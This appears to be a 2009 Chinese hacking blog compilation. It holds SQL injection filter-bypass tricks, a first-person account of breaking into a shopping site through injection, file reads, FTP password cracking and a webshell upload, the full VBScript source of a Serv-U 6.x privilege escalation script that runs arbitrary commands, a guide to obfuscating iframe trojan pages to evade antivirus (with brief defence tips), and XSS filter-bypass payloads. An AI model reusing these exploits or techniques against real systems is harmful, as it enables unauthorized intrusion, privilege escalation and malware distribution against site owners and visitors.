一种特殊的Iframe挂马的解决方法
作者:stardust 日期:2009-06-23
sql注入的一些新发现,突破关键字过滤
作者:stardust 日期:2009-06-23
一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以 用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知 道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。
引申一下,只用%0d能正常执行语句吗?只用%0a呢?测试证明,用任意一种分割在mssql、mysql和access里面都是可以的。
另外,关于mssql的多语句问题。我以前一直以为必须用分号作为语句的结尾,后来发现,完全不是那样。类似
select * from table exec xp_cmdshell'xxxxxxxxxx'
select * from table/**/exec xp_cmdshell'xxxxxxxxxx'
利用serv-u拿下网上商城
作者:stardust 日期:2009-06-23
注:文章已经发表于2006年第8期《黑客手册》,后由原创作者友情提交到邪恶八进制论坛,转载请著名原始出处《黑客手册》。
今天,渗透的是一家性用品商城,网站用的全是php程序,对于php构建的系统,一般后台数据库都是mysql,就像asp对应着mssql和一样,由于 php的特性(php默认将传递参数中的“‘”等字符做了转换,所以对于字符类型的变量默认情况下很难注入),一般情况下我们注入的只能是数字类型的变量,根据平时注入的知识,我们知道id=xxx的连接就有可能找到漏洞!
一、寻找注入点
首先,在主站上转悠了一圈,主站中的数字类型变量不存在注入漏洞,提交http://www.XXX.com/view.php?id=1250 and 1=1和 1=2 ,在网页里把and 1=1和and 1=2都正常返回。
图1 主站不存在注入点
显然是做了过滤,因为网站二级页面也是php程序写的,所以我就想先从二级页面入手,进入了一个二级页面,好像是性图书联盟,这种东西害了多少青少年啊,今天就先拿你开刀,免得再腐蚀青少年的思想,随便打开了一个数字类型变量的页面
http://shu.XXX.com/book_view.php?id=339,提交
http://shu.XXX.com/book_view.php?id=339 and 1=1,返回正常页面,提交
http://shu.XXX.com/book_view.php?id=339 and 1=2,没有返回数据, 果然存在注入漏洞,手工来解决吧,手工注入更有助php注入的学习,提交http://shu.XXX.com/book_view.php?id=339 order by 20,页面正常返回,提交
http://shu.XXX.com/book_view.php?id=339 order by 10,没有返回数据, 说明字段数在10和20之间,接着试提交http://shu.XXX.com/book_view.php?id=339 order by 15也是正常的,说明字段数在15和20之间,当我提交到18时,页面没有数据返回,说明字段数是17,18左右,接着提交http://shu.XXX.com/book_view.php?id=339 and 1=2 union select 1,2,4,5,6,7,8,9,10
,11,12,13,14,15,16,17/*,返回结果
图2 性图书联盟的注入点
确定了字段数是17个。下面接着提交http://shu.XXX.com/book_view.php?id=339 and 1=2 union select 1,version(), database(),4,5,6,7,8,user(),10,11,12,13,14,15,16,17/*,返回结果
图3 查询数据库的信息
现在我们完成了对数据库系统的探测。因为我们有可能不是root权限,并且数据库和web服务器可能不在同一台主机上,这样我们就没有读取文件的权限了,测试下再说,先看下是用的什么系统,如果是Linux,可以提交etc/passwd,如果是windows,可以提交c:\\boot.ini,成功读取出了c:\\boot.ini文件内容,可以读取文件内容,主机用的是windows 系统,还是windows2003。
图4 查询服务器的信息
下面再来猜后台,先猜出后台再说,因为很多时候猜出了用户名和密码,最后却找不到后台登录的地方。先试了几个常见的,admin、manage、 admin、php、manage、php、login、admin_index.php,结果都没找到。我想应该是管理员把后台改了,但是一般管理员不会改的很复杂,我就在一些常用的后台上加了些数字,例如:admin123、admin123456、admin88、admin888、 manage888,我就依次试了试,结果后台出来了,真是黄天不负有心天啊!http://shu.XXX.com/admin888/admin_login.php,
图5 性图书联盟的后台登录地址
接下来,我们该猜解管理员表名,用户名,密码了,常见的都试了一遍,例如:user、admin、manage,password、pass、login,一个都没有,用工具也试了一遍,也没找出来,入侵陷入困难,看看时间,也该睡了,养好精神明天再接着渗透。
二、利用serv-u用户信息配置文件拿webshell
第二天上课时,手里刚好有本《黑客手册》第3期,反正课也无聊,我就开始看《黑客手册》,Q版黑客栏目里一篇文章,《从万象VOD视频点播到FTP密码》给了我启发,既然我没有办法猜到表名,可以试试文章里的方法啊,它也是windows系统,而且可以读取系统文件内容,如果管理员没有改变serv-u的安装路径,那我就可以像文章里说的,先读取serv-u用户信息配置文件ServUDaemon.ini中的内容,然后再猜解加密密码,如果能猜出密码,就可以成功拿到网站的权限了。
课一上完,我就回到寝室,马上打开电脑,先对网站进行了一次扫描,服务器开了只开了21、80端口,我用ftp shu.XXX.com,连上去看了下,果然用的是serv-u,而且是6.0版本的,那我先试试,看serv-u是不是在默认的安装路径
C:\\Program Files\\serv-u\\ServUDaemon.ini, 在地址栏提交
http://shu.XXX.com/book_view.php?id=339 and 1=2 union select 1,2,3,4,5,6,7,8,load_file(char (67,58,92,92,80,114,111,103,114,97,109,32,70,105,108,101,115,92,92,115,101,114,118,45,117,92,92,83, 101,114,118, 85,68,97,101,109,111,110,46,105,110,105)),10,11,12,13,14,15,16,17/*,没想到真是安装在默认路径,读取出了serv-u的用户信息配置文件内容,
图6 服务器serv-u的用户信息配置文件
只有三个用户,马上把内容复制到本地,打开serv-u纯数字密码破解器,立刻破解,没想到只用了不到一分钟,我就破解出了一个用户的密码,是纯数字的,密码是321321,用户的默认路径是e:\shu_XXX_com,应该是存放网站的路径,马上拿出Flashxp连上去,果然是存放这个二级网站的目录
图7,性图书联盟的FTP目录
马上上传了一个php一句话木马,在浏览器中打开php木马,
图8 成功拿到二级页面性图书联盟的webshell
网站的webshell拿到了,真是爽啊,今天运气真的不错,呵呵。
Serv-U 6.X 提权脚本
作者:stardust 日期:2009-06-23
loginuser = "User " & user & vbCrLf <input type=button value=" 返回继续 " onClick="location.href='<%=gname()%>';"> <%
<%@ LANGUAGE = VBScript %>
<%
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
f=left(f,2)
end if
ftpport = ffport
timeout=3
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DeleteDOMAIN" & vbCrLf & "-IP=" & iip & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=leaves|" & iip & "|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=luo" & vbCrLf & "-Password=ye" & vbCrLf & _
"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case action
case 1
set a=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s1",True, "", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
set session("a")=a
%>
<form method="post" name="leaves">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="2"></form>
<script language="javascript">
document.write('<center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令:<%=pass%>...<center>');
setTimeout("document.all.leaves.submit();",4000);
</script>
<%
case 2
set b=Server.CreateObject("Microsoft.XMLHTTP")
b.open "GET", "http://127.0.0.1:" & ftpport & "/leaves/upadmin/s2", True, "", ""
b.send "User luo" & vbCrLf & "pass ye" & vbCrLf & "site exec " & cmd & vbCrLf & quit
set session("b")=b
%>
<form method="post" name="leaves">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="3"></form>
<script language="javascript">
document.write('<center>正在提升权限,请等待...,<center>');
setTimeout("document.all.leaves.submit();",4000);
</script>
<%
case 3
set c=Server.CreateObject("Microsoft.XMLHTTP")
c.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s3", True, "", ""
c.send loginuser & loginpass & mt & deldomain & quit
set session("c")=c
%>
<center>提权完毕,已执行了命令:
<font color=red><%=cmd%></font>
</center>
case else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
%>
<center><form method="post" name="leaves">
<tr align="center" valign="middle">
<td colspan="2">Serv-U 6.X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆</td>
教你如何在网页木马中加密代码(图)
作者:stardust 日期:2009-06-10
对挂马网页进行加密是黑客经常用的手段,这种手段能够躲避杀毒软件的追杀,因此近年来黑客在进行网页挂马时,通常会选择将已经做好的网页代码进行二次加密甚至多次加密。
早期黑客多数都只采用简单的Unicode转码来实现加密,但是采用这种加密方式的网页很快就被杀毒软件查杀了,无法再有效地起到免杀作用,因此网页加密也开始逐步升级花样百出,从Escape可转换编码加密到转义字符加密,最后发展到自定义函数来进行加密。
安全百科:Escape是一个存在于JavaScript、VBS等脚本语言中的函数,在JavaScript中,Escape函数起着让一些非英语字符在传递过程中进行重新编码再传递的作用。
网页木马为什么要加密
网页木马人人恨,杀毒软件对它也是非常关注,也会采取各种防范手段。网页木马的传播就受到限制,为了更好地生存,为了不被杀毒软件等安全工具发现,很多黑客对网页木马进行了加密,增加了杀毒软件查杀的难度,提高了网页木马的生存率。因此,主流的网页木马都是进行过加密的。
网页木马加密的种类有许多,多数都是利用网页代码各个标准互相转换的特点,进行编码的转换加密,这种加密方式在某种意义上,只是干扰了依靠特征码辨识网页木马的杀毒软件的识别,但并没有将自己加密。因此,现在比较高级的加密手段是在编写脚本语言的时候自己进行函数的定义,然后再进行字符串加密,多制造一些让杀毒软件混乱的门槛,从而让它们无从辨别。
用字符转换的方式进行加密,就如同我们用中文对一个翻译讲话一样,我们计算机就是这个精通许多语言的翻译,我们将一句话告诉这个翻译,这个翻译随后用英语将这段话抄了下来,然后又用替换密码将这段英文进行简单的替换,最后再将这段英文用莫尔斯电码发送给另外一个能够解密的翻译。
由于整个过程使用的都只是基本的代码转换,因此任何一个懂英语会莫尔斯电码并了解英文替换密码的人都能够解开这个密码,但是对于不会英语或者不会发电报的人而言,这已经是非常费解的东西了。下面,我们以当前黑客最常用的Escape加密方法为例,剖析网页木马加密的方式和防范方法。
安全八卦:在密码学的历史上,最有名的替换密码工具是二战时期德军使用的代号为“Enigma”的密码机,Enigma在二战时为德军的闪电战和德国海军的“群狼”潜艇战提供了绝佳的通讯保密措施。为了能够解密Enigma,盟军在英国专门建立破译中心,而在这个中心中诞生了世界上第一台计算机,20世纪最伟大的计算机之父阿兰·图灵就是在破解Enigma的时候产生了许多现代计算机雏形的理论。
网页木马加密/解密实录
攻
首先编写需要加密的HTML代码,这里选用以下IFRAME框架挂马中的代码:
然后登录转换网站http://tool.chinaz.com。
在网页中找到“代码转换工具”,然后点击选择下拉菜单中的“URL16进制加密”一项,之后将木马网页链接地址 http://soft.yesky.com输入到地址栏中,点击“加密”后为http://%73%6F%66%74%2E%79%65%73%6B%79%2E%63%6F%6D/ (图1)。
接着,将加密后的网址粘贴回原来的IFRAME代码中:
http://%73%6F%66%74%2E%79%65%73%6B%79%2E%63%6F%6D/ width=400 height=300>
再点击“代码转换工具”菜单中的“Encode加密/解密工具”,将IFRAME代码复制到输入框中,点击“Encode加密”,得到加密后的代码:%3Ciframe+src%3D+http%3A%2F%2F%2573%256F%2566%2574%252E%2579%2565%2573%256B%2579%252E%2563%256F%256D%2F+width%3D400+height%3D300%3E%3C%2Fiframe%3E+
(图2)。
然后,打开写字板程序,将下列代码输入到写字板中,并将加密代码复制到指定位置:
<SCRIPT LANGUAGE="Javascript"><!——
var Words ="把加密生成后的代码复制到此处就 OK 了!"
function OutWord()
{
var NewWords;
NewWords = unescape(Words)
document.write(NewWords);
}
OutWord();
// ——>
</SCRIPT>
最后,点击“代码转换工具”菜单中的“JS方式加密/解密”,将修改完成的JavaScript代码复制到输入框中,然后点击“JS加密”,完成代码加密过程(图3),再将加密后的代码放入到希望插入木马的网页中即可。以后,当用户访问该网站时,就会激活木马。
防
安全工程师碰到加密的恶意网页时,同样进入转换网站,然后将那些复杂的代码粘贴到解密的输入框中,再点击“解密”按钮即可解出原文。但是需要注意的是,由于解密涉及到不同的字符编码之间的转换,因此在解密过程中一定要抓住不同编码的特点,例如Escape编码中,通常会以“%”作为开头,在将中文转换为Escape编码后,往往是“%”后面紧跟着小写字母“u”,接下来是4位字母,它们就是16进制的字符。
一般用户要防范加密过的恶意网页,最好的方法是开启杀毒软件中的脚本过滤功能,或者在IE浏览器“Internet选项”中的“高级”标签中选择“禁用脚本调试”。此外JS加密和URL16进制加密有时在火狐浏览器中会被自动屏蔽,在浏览自己怀疑有危险的网页时,可以选择火狐浏览器。
教你插入XSS代码的方法
作者:stardust 日期:2009-06-10
1.脚本插入
(1)插入javascript和vbscript正常字符。
例1:<img src="javascript:alert(/xss/)">
例2:<table background="javascript:alert(/xss/)"></table>'/在表格中插入脚本
例3:<img src="vbscript:msgbox("a")">
(2)转换字符类型。将javascript或vbscript中的任一个或全部字符转换为十进制或十六进制字符
例1:<img src="javascript:alert(/xss/)"> '/将j字符转为十进制字符j 。
XSS下的绕过过滤教程(图)
作者:stardust 日期:2009-06-10
很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,最常见的就是对转换成,经过转换以后虽然可在正确显示在页面上,但是已经不能构成代码语句了。这个貌似很彻底,因为一旦被转换掉,什么就会转换成“”,不能执行,因此,很多人认为只要用户的输入没有构成,就不能闭合前后的标签,其语句当然也不会有害。
但是,万事总有可能,只要有一定的条件,我们就可以构造经过编码后的语句来进行XSS。
1. 转义字符
首先要认识一下“\”,这个不是斜杠么。对的,斜杠在JAVASCRIPT有着特殊的用途,它是转义的符号。例如,我们把我们XSS语句转换成16进制,这里是alert(‘poruin’),我用在CHA88那里淘过来的脚本工具来转换,如图:
结果如下
\x3C\x73\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x27\x70\x6F\x72\x75\x69\x6E\x27\x29\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E
这些就是经过编码后的字符,因为前面的斜杠缘故,所以后面的这些字符在JAVASCRIPT中都会被还原。
我们再来看一下测试用的index.asp
if request("text1") "" then
a=replace(replace(request("text1"),"",">")
end if
%>
a=""
document.write(a)
很简单的内容,接受用户的数据后过滤,再用JAVASCRIPT显示出来,直接输入XSS的测试语句看看,被转换掉了吧。再来输入经过16进制转换后的字符,这些字符都可以轻松的逃过过滤,完整进入代码中,经过JAVASCRIPT还原之后,正确解释出来,如图
而不但是十六进制可以,八进制同样奏效,转换后代码如下:
\74\163\143\162\151\160\164\76\141\154\145\162\164\50\47\160\157\162\165\151\156\47\51\74\57\163\143\162\151\160\164\76
二.UBB标签
UBB标签是目前广泛运用到论坛,留言簿,以及其他网站系统的一种编码标签,类似这样的,用户在中间输入地址后即可,在发表的时候系统会自动改成。这个URL就是用户输入的图片地址,XSS攻击中,可以利用这个特点来达到无需用户输入就能执行由用户所输入的代码,我们只要在输入网址的地方输入:
x"/**/onerror="alert('poruin')
那么经过转换后就变成了
在JS中空格可以用/**/转换,如图:
三.JS还原函数
JS中的编码还原函数最常用的就是String.fromCharCode了,这个函数用于ascii码的还原,一般来说,这个函数都要配合EVAL来使用才有效果。
在跨站中,String.fromCharCode主要是使到一些已经被列入黑名单的关键字或语句安全通过检测,把关键字或语句转换成为ASCII码,然后再用String.fromCharCode还原,因为大多数的过滤系统都不会把String.fromCharCode加以过滤,例如关键字alert被过滤掉,那就可以这么利用:
执行效果如上图一样,没有关键字同样执行想要执行的代码。
文章到此大致结束了,要知道在XSS中可以利用绕过过滤的技术远不止这些,毕竟有防自然也会有攻,魔高一尺道高一丈,我写这文章时间很短,都是依靠我自己的理解来写的,有不正确的地方欢迎各位指出,也希望能和一些喜欢脚本安全或者是XSS的朋友一起讨论这方面的内容。
本人的blog是:http://hi.baidu.com/poruin
END
PoRuin(QQ56189577)
2009-4-18
附:解释《淘宝跨站脚本漏洞》最后所留下来给读者的问题
在这篇文章的最后提及到这么一段HTML代码
function show(){ }
tom
浏览器打开,弹出一个框框,内容为1。这段代码看起来就像建立和引用一个函数,但是看看中间的那段被HTML编码的字符,解码后完整代码如下:
function show(){ }
tom
这里就很容易看出来,作者在玩一个填字游戏,和传统的跨站要闭合前后一样,在函数SHOW所引入的字符中也闭合了前面的函数,然后就是自己JAVASCRIPT代码,实现了JS代码的注入。想一下,这种情况是比较容易发生的,只不过是大家比较少想到的地方,我们还在闭合标签的时候,别人就已经开始闭合函数来实现XSS了。延伸一下,既然可以闭合函数,那么其他也自然可以闭合,像下面的语句一样:
执行之后弹出一个无内容的框,然后显示by:poruin几个字 。如图
正如跨站的特点,只要是输出由用户所输入的数据的地方都有可能存在跨站。
